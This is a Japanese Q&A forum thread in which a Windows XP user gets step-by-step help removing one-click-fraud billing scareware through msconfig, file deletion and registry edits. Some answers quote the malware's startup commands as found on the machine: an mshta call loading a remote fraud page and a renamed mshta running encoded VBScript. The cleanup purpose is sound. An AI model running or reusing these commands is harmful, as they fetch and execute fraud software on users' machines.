• ベストアンサー
  • 暇なときにでも

ワンクリック詐欺表示対策

  • 質問No.7113627
  • 閲覧数1422
  • ありがとう数10
  • 気になる数0
  • 回答数8
  • コメント数0

お礼率 94% (1522/1608)

ワンクリック詐欺表示対策について教えて下さい。
XP HOME を使用しています。
ユーザーを下記のように設定しています
OWNER
USER1
USER2
USER3
USER4

このうちUSER4でログオンするとデスクトップにワンクリック詐欺のウインドウが表示されます
それ以外のユーザーには表示されません。
タスクマネージャでmshtaのプロセスを終了すると表示は消えます。
ところが再度USER4でログオンするとデスクトップにワンクリック詐欺のウインドウが表示されます
OWNERでログオンしたときタスクマネージャでmshtaのプロセスはありません。

但し、このあと、どのようにすればいいのかわかりません。

皆様どうぞよろしくお願いします。

質問者が選んだベストアンサー

  • 回答No.8
  • ベストアンサー

ベストアンサー率 33% (1/3)

忘れてた分を追加

以下のレジストリキーがあれば削除。
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\HttpPrintSettings
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\HttpXmlPolicy
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\NetworkLayerCenter
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\ScreenHttpStories
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\ShellSortieUnit

亜種で変更になっていた場合は名前が変わっているかもしれませんが、その場合は間違って削除した方が問題なので何もしない方がいいです。
お礼コメント
BABA4912

お礼率 94% (1522/1608)

ありがとうございます

> 以下のレジストリキーがあれば削除。
・・・内容は略・・

すべてこちらもありませんでした
現在症状はでていません
投稿日時:2011/11/13 02:00

その他の回答 (全7件)

  • 回答No.7

ベストアンサー率 33% (1/3)

お礼の記述からレジストリは詳しくなさそうなので、やり直しのきくmsconfigでの処理を指示したんですが、バックアップが残っているのが嫌ならレジストリエディタでの削除方法も書いておきます。

まず、「msconfig」でチェックを外した項目にチェックをつけ、適用をして元に戻してください。

次にファイル名を指定して実行で「regedit」を実行してレジストリエディタを起動。
下記のキー内のmsconfigでチェックを外した値を削除すれば、レジストリから削除されます。
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run

なお、広告が表示されてから作業が終了されるまでの間にシステムの復元のポイントが作成されていた場合は、もしそのポイントに復元すればレジストリ等が元に戻りますので、その時はまた同じ作業をしてください。
お礼コメント
BABA4912

お礼率 94% (1522/1608)

> msconfig」でチェックを外した項目にチェックをつけ
その項目はなぜか表示されませんでした

>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
こちらもその項目はなぜかありませんでした
投稿日時:2011/11/13 01:58
  • 回答No.6

ベストアンサー率 33% (1/3)

それであってます。
ただ、フォルダはランダムで既存のものにファイルを作成するタイプですので、ファイルの削除のみにしてください。

"C:\Documents and Settings\USER4\Application Data\Identities\Heiper.lnk"
"C:\Documents and Settings\USER4\Application Data\Identities\Heiper.LOG"
"C:\Documents and Settings\USER4\Application Data\Microsoft\wmMsgSvr.exe"
"C:\Documents and Settings\USER4\Application Data\Microsoft\view78vu.bin"

これだけ削除すれば終わりです。

実はもう一つファイルがコピーされているんですが、mshta.exeを別名でApplication Dataのサブフォルダ内に作成されています。
使用されていませんので問題ありませんが、気になるようならexeファイルを「プロパティ」「詳細」でmshta.exeのものを削除してください。

お疲れ様でした。
お礼コメント
BABA4912

お礼率 94% (1522/1608)

ご指示どおり削除しました。

C:\Documents and Settings\user4\Application Data\Adobe
にupdater.exeというファイルがありました
プロパティ バージョン情報 正式ファイル名をみたところ
MSHTA.EXE となっていましたのでこれを削除しました。
ありがとうございます
あと気になるのはレジストリは汚れたままなのでしょうか
投稿日時:2011/11/09 22:38
  • 回答No.5

ベストアンサー率 33% (1/3)

ご注意くださいか(笑)
名前で気づきませんでしたか?下で紹介されているツールの作者です。

サイトからショートカット作成型のワンクリックウェアのようですね。

USER4でログオンして、タスクマネージャーからmshta.exeを終了して作業をしてもらいます。

スタートの中のファイル名を指定して実行からmsconfigと入力してシステム構成を起動してください。
「スタートアップ」の中の場所の目印がこちら
HKCU\Software\Microsoft\Windows\CurrentVersion\Run

「コマンド」の目印はこちら(ランダムでサイトの英数字は変わりますので、そのへんは臨機応変に)
"C:\WINDOWS\system32\mshta" ttp://334a.systray.me/qzhyxwh/X4Zta3JM1EpQor8NiwAJKw.htm
さらにコマンド内にこのような感じの記述があるはずです(フォルダ、ファイル名がランダムに変わります)
"C:\Documents and Settings\USER4\Application Data\Smart Panel\Shortcjt"
この二つの左のチェックボックスを外して適用をすればとりあえずは再起動で画面は出なくなります。

次にファイルの削除です。
"C:\Documents and Settings\USER4\Application Data\Smart Panel\Shortcjt"
このファイルがショートカットでShortcjt.lnkですので、フォルダを開き右クリックから「プロパティ」から「ショートカット」を選んでください。
"C:\Documents and Settings\USER4\Application Data\Skype\WscMgr.exe" //B //E:VBScript.Encode "C:\Documents and Settings\USER4\Application Data\Macromedia\categoryBiy"
このような感じで表示されると思いますので
"C:\Documents and Settings\USER4\Application Data\Skype\WscMgr.exe"
"C:\Documents and Settings\USER4\Application Data\Macromedia\categoryBiy"
"C:\Documents and Settings\USER4\Application Data\Smart Panel\Shortcjt.lnk"
この3つのファイルを削除して終了となります。

ツールを使った方が面倒じゃないんですが、手動削除の手順を説明するとこのような感じになります。
もっと詳しく説明して貰いながらやりたいなら、アダ被さんの質問掲示板へでも行くことをおすすめします。
ただ、システムの復元はトラブルを起こす可能性があるので、やらない方がいいですが。
http://www.higaitaisaku.com/
お礼コメント
BABA4912

お礼率 94% (1522/1608)

すみません 気づいていませんでした ありがとうございます。
ご注意くださいは 色々な方が見られると思いましたので記載しました。
再度のお願いがございますか下記のようにしましたがこれでよろしいでしょうか
よろしくお願い申し上げます。

user4にadministrator権限を与えてmsconfigで
下記の2項目のチェックを外しました
スタートアップ項目 mshta" ttp://334a
コマンド "C:\WINDOWS\system32\mshta" ttp://334a.systray.me/・・・以下略
場所 SOFTWARE\Microsoft\Windows\CurrentVersion\RUN

スタートアップ項目 Heiper"
コマンド "C:\Documents and Settings\USER4\Application Data\Identities\Heiper"
場所 SOFTWARE\Microsoft\Windows\CurrentVersion\RUN

まだ削除してませんが 下記のフォルダやファイルがあります

C:\Documents and Settings\USER4\Application Data\Identities
に下記がありした
{43C47253-4F4C-4BAF-824D-5C3C9F15C204}というフォルダ フォルダの中身はなし

Heiper.LOG というファイル 中身はなし
Heiperというショートカットがありそれが下記にリンクしていました

C:\Documents and Settings\USER4\Application Data\Microsoft\wmMsgSvr.exe" //B //E:VBScript.Encode "C:\Documents and Settings\USER4\Application Data\Microsoft\view78vu.bin"

なお下記は実際にありました。
C:\Documents and Settings\USER4\Application Data\Microsoft\view78vu.bin"

すると下記の処理でよろしいでしょうか
下記を削除
C:\Documents and Settings\USER4\Application Data\Microsoft\view78vu.bin"
下記をフォルダごと削除
C:\Documents and Settings\USER4\Application Data\Identities

よろしくお願いします。
投稿日時:2011/11/09 00:33
  • 回答No.4

ベストアンサー率 33% (1/3)

情報が少なすぎて、どのタイプのワンクリウェアに感染しているのか判断できません。
XP Homeや症状からタスクスケジューラやHKLMの登録はないと思われるので、HKCUに登録されているだけでしょうけど。
ショートカット作成型だと手動削除は難しいですよ?
手動削除が希望ならサイト名かURLを教えて貰わないことにはこれ以上は無理です。
補足コメント
BABA4912

お礼率 94% (1522/1608)

ご注意 *ttp://334a.systray.me/ をご覧頂く際はご注意ください。
投稿日時:2011/11/08 07:05
お礼コメント
BABA4912

お礼率 94% (1522/1608)

ご心配いただきありがとうございます。
わからないのですが恐らく *ttp://334a.systray.me/ と思われます。

レジストリを見て *ttp://334a.systray.me/ を検索して見ました
このときOWNERでログオンしています

HKEY_CURRENT_USER - Software - Microsoft - Inrenet Explorer- TypedURLs
url1 *ttp://334a.systray.me/
url2 http://www.b-ch.com/ttl/index.php?ttl_c=912
url3 http://www.youtube.com/watch?fmt=18&gl=JP&hl=ja&v=0W-QLVoXhlM&fmt=18
url4 http://www.ajino-mingei.co.jp/
url5 http://www.nihonkiin.or.jp/
投稿日時:2011/11/08 07:02
  • 回答No.3

ベストアンサー率 48% (2859/5926)

ANo.2 です
>しかし、こちらのサイトの方法も怖くてできていません。
であれば、必要なファイル(データ)や設定をバックアップしてリカバリしかありません
メーカー製パソコンにはバックアップ専用ソフトがインストールされているので、それを使いましょう。
お礼コメント
BABA4912

お礼率 94% (1522/1608)

ありがとうございます。
#2の方法はレジストリを沢山みているようでちょっと怖いです。

デルのバソコンです。
リカバリCDはありますが出来ればそれは最後の方法にしたいです。
投稿日時:2011/11/08 06:41
  • 回答No.2

ベストアンサー率 48% (2859/5926)

>但し、このあと、どのようにすればいいのかわかりません。
USER4でログオン、このサイトをよく読んでツールを使います
http://sasi40dx.cs.land.to/

スパイウェアではありませんのでスパイウェア対策ソフトは効果がありませんし
よく似た名前の「ワンクリックウェア駆除ツール」やシステムの復元を使ってはいけません
回答者が「当方では不都合がありません」と言ってもあなたに当てはまる保証はありません
リカバリ覚悟なら止めませんが、こんな物のためにそこまでするのは馬鹿げています。
お礼コメント
BABA4912

お礼率 94% (1522/1608)

ありがとうございます。
そのサイト見ました。
しかし、こちらのサイトの方法も怖くてできていません。
投稿日時:2011/11/06 14:12
  • 回答No.1

ベストアンサー率 36% (27471/74999)

スパイウェアを駆除すれば消えませんか?
http://enchanting.cside.com/security/spybot1.html
お礼コメント
BABA4912

お礼率 94% (1522/1608)

ありがとうごさいます。
投稿日時:2011/11/06 14:11
結果を報告する
このQ&Aにはまだコメントがありません。
あなたの思ったこと、知っていることをここにコメントしてみましょう。
関連するQ&A

その他の関連するQ&Aをキーワードで探す

ピックアップ

ページ先頭へ